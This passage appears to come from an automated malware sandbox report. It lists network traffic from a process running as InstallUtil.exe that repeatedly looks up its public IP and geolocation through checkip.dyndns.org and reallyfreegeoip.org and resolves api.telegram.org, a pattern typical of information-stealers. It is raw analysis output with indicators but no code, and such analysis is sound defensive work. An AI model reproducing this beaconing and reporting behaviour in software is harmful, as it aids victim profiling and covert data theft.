                                                                                                            Jan 11, 2025 06:50:48.394500017 CET4998080192.168.2.7158.101.44.242

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 11, 2025 06:49:54.168699026 CET5464953192.168.2.71.1.1.1
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET53546491.1.1.1192.168.2.7
                                                                                                            Jan 11, 2025 06:49:54.987406969 CET5126053192.168.2.71.1.1.1
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET53512601.1.1.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.566524982 CET6146353192.168.2.71.1.1.1
                                                                                                            Jan 11, 2025 06:50:32.573194027 CET53614631.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 06:49:54.168699026 CET192.168.2.71.1.1.10xf285Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.987406969 CET192.168.2.71.1.1.10xd06Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:50:32.566524982 CET192.168.2.71.1.1.10xd68Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.175420046 CET1.1.1.1192.168.2.70xf285No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:49:54.994415998 CET1.1.1.1192.168.2.70xd06No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 11, 2025 06:50:32.573194027 CET1.1.1.1192.168.2.70xd68No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749974158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:49:54.205626011 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:49:54.782908916 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1d4e51e60585519d139b4a8b7878b71c
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 11, 2025 06:49:54.787698984 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:49:54.945127010 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 680c31a1cf62f71f0bcd631035c88d60
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 11, 2025 06:49:55.891335011 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:49:56.049045086 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:55 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1c43368d0a89c5eb88b92b32a0d123c3
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749978158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:49:56.710499048 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:49:57.322055101 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 865c7354a835e387f1a9e454995e2c6e
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.749980158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:49:57.929539919 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 11, 2025 06:49:58.510333061 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:58 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 91fffedae009b47884576ada5ab340fc
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749982158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:49:59.131913900 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:49:59.696301937 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 8645d7bd7aecdfbef775ce1dfb82588a
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.749984158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:50:00.351129055 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:50:06.095999956 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:06 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: b67f30b4a9cb58c86d7cc8a6efce460b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.749986158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:50:06.712234974 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:50:23.606889009 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 7fcc4cbe496e502be43b66ce9c4eec7b
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.749988158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:50:24.367142916 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:50:28.448599100 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 1884ca47231fe82369f91d98a3ccf1ab
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.749990158.101.44.242807612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 06:50:29.086675882 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 11, 2025 06:50:31.883913994 CET321INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 3c8aa0629279f68865fa3de560b3d1fb
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749975104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:49:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:49:55 UTC851INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:55 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889384
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnbP0kOZmWRxWzr4Z5BxkZ1XtCKeuWb%2BDrYS9voP6nXhjL0xwHijeJigzXXKmVaGNDLkTM1YMVPBd1ZNWCnGAucyP9K0Q5Zu1BIHseeTE4YyPsVzm0enh1xGsv6G2O5PoXUIVC3M"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a057ee724414-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1587&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1818181&cwnd=180&unsent_bytes=0&cid=4a22dab9fddc3a8f&ts=329&x=0"
                                                                                                            2025-01-11 05:49:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749976104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:49:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-11 05:49:56 UTC861INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:56 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889385
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciyTUXJKY1LpNE%2BUdzDQ1sl%2FLrjzQsba7z%2F1C2c5yEXr3KYz3EPadT5K9C0USE7e382aFCTKYdheiOwiezA3%2BHEnkZTFNrXemh%2F7ORzuxZu4W%2FdTfVUAUnwVvoxsWIbPR0kugQPv"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a05cf8367c6a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1968&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1440552&cwnd=218&unsent_bytes=0&cid=6d2a4590bb251613&ts=161&x=0"
                                                                                                            2025-01-11 05:49:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.749979104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:49:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:49:57 UTC867INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:57 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889387
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcFngWJXGCanFUphf%2FOJENTTq9Qnu%2B%2BfsxZgyk5Ze3uDvM0iCLb%2BM2FnvLZWy%2FG6%2Bwo6WM%2BCY9oitfoYCF8mZdjRw1ttldZt11gZK%2Bd2n5N5QZbgshu%2Fv9E4rqUXpKIttkHVvbCr"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a064aa4ede95-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1606&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1780487&cwnd=243&unsent_bytes=0&cid=ee7e940648c9e794&ts=136&x=0"
                                                                                                            2025-01-11 05:49:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749981104.21.64.14437612C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-11 05:49:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-11 05:49:59 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:59 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889388
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
